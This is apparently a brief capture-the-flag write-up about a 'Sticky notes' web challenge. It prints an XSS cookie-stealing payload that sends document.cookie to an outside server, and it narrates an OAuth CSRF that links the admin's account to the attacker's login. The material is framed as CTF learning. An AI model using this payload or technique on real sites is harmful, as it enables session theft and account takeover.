

Sticky notes app. There's a couple interesting things to note here. Link with OAuth and Report a problem.
Checking out 'Report a problem' first

So this got me thinking. If the admin is looking into it, maybe there's some kind of vulnerability on the back end.
I fired up my VPS and started a php session to see if I could steal some cookies
Reported this payload as a problem:
`<img src=x onerror=document.location="http://REDACTED/cookie.php?c="+document.cookie>`

So XXS is in play, but the cookies are set to HttpOnly. No dice there.
The title of the challenge is a big hint on what to do next:
Cross Site Request Forgery or CSRF (Sea Surf) for short
I assumed that it had something to do with OAuth, so I fired up burp to capture the requests

Forwarding the first request leaves us with the second.

After some testing I noted that the 'code' variable is one use. So I set this request to repeater and dropped it.
Right click anywhere on the request and 'Copy URL'
Back on the sticky notes app, we can report another problem

Send that off and then logging into our OAuth account we can see that we're now connected with the Admin sticky notes account

---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #oauth #csrf #web
Related: